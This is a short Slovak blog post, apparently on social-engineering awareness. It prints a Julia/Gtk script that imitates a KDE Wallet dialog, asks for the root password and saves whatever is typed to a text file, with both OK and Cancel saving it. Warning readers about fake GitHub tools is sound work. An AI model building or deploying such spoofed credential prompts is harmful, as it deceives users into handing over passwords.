Vírus do 30 minút, alebo sociálne inžinierstvo v praxi :) Aj vám už poslali nový program z githubu?

Vírus do 30 minút, alebo sociálne inžinierstvo v praxi :) Aj vám už poslali nový program z githubu?

Aj vám prišiel do mejlu program Kde-wallet? Pozrime sa ako bezpečnostní analytici, čo by mohol taký kód na pár radkov spustiť. Btw s AI máte tento fejk do 30 minút aj s polevou ;) https://hrubos.tech/blogy/content/images/20260129191637-kdewallet1.png

import Pkg
# --- Zabezpečenie balíka ---
function ensure_package(pkg::String)
    try
        @eval import $(Symbol(pkg))
    catch
        println("Installing package $pkg ...")
        Pkg.add(pkg)
        @eval import $(Symbol(pkg))
    end
end
ensure_package("Gtk")
using Gtk
# --- Zistenie práve prihláseného používateľa ---
user = get(ENV, "USER", "user")
home_dir = "/home/$user"
# --- Vytvorenie okna ---
win = GtkWindow("KDE wallet - add your root pwd", 300, 100)
vbox = GtkBox(:v)
push!(win, vbox)
# --- Line edit ---
entry = GtkEntry()
push!(vbox, entry)
# --- HBox pre tlačidlá ---
hbox = GtkBox(:h)
push!(vbox, hbox)
# --- Funkcia pre uloženie textu ---
function save_text()
    text = Gtk.get_gtk_property(entry, :text, String)
    file_path = joinpath(home_dir, "text.txt")
    open(file_path, "w") do f
        write(f, text)
    end
    println("pwd saved to $file_path on OK also Cancel")
end
# --- Funkcia pre zatvorenie okna ---
function cancel()
    Gtk.destroy(win)
end
# --- Tlačidlá ---
btn_ok = GtkButton("OK")
signal_connect(btn_ok, :clicked) do _
    save_text()
end
push!(hbox, btn_ok)
btn_cancel = GtkButton("Cancel")
signal_connect(btn_cancel, :clicked) do _
    save_text()
end
push!(hbox, btn_cancel)
# --- Zobrazenie okna ---
showall(win)
# --- Channel pre čakanie na zatvorenie okna ---
done = Channel{Bool}(1)
signal_connect(win, :destroy) do _
    put!(done, true)
end
# --- Čakáme na zatvorenie okna ---
take!(done)

Teda vrámci sociálneho inžinierstva si myslíte, že je to stále bezpečný KDE-wallet, čo je akási peňaženka na heslá. No, čo ak heker pošle hoci aj legálny program, ktorý spustí obdobu v systéme a vy si len myslíte, že si odomykáte prehliadač a jeho heslá pre automatické zadávanie :)

Išlo totiž o to, že som si kúpil svietiacu klávesnicu, ale čuduj sa svete stiahol som si z github NitroSense pre Endeavour OS, ktorý je potrebný pre reguláciu podsvietenia. Á zrazu, čuduj sa svete sa ozvala moja Kde-Wallet ;)

Related posts

Author: AarNoma

The first Slovak cyborg 1 system

Comments “Vírus do 30 minút, alebo sociálne inžinierstvo v praxi :) Aj vám už poslali nový program z githubu?”